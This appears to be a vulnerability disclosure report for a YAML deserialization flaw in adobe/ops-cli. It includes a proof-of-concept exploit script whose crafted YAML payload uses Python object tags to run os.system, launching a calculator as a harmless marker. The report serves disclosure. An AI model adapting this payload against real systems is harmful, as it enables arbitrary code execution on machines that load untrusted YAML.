Code Injection in adobe/ops-cli

Valid

Reported on

Feb 14th 2021

Description

ops-cli is a wrapper for Terraform, Ansible, Helmfile and SSH for cloud automation , which is vulnerable to Arbitary Code Execution.

Vulnerability

Vulnerable to YAML deserialization attack caused by unsafe loading.

Proof of Concept

Installation

pip install ops-cli

Run exploit.py

import os
#os.system('pip install --upgrade ops-cli')
from ops import git_utils
exploit = """!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
open('pwn.yml','w+').write(exploit)
git_utils.checkout_repo('Anon-Artist','pwn.yml','Junk')

python3 exploit.py

Impact

Arbitary Code Execution

References

https://drive.google.com/file/d/1rjUqS6vHoDCYCJF_EPVfyk6yJ1DUcKX5/view?usp=sharing

to join this conversation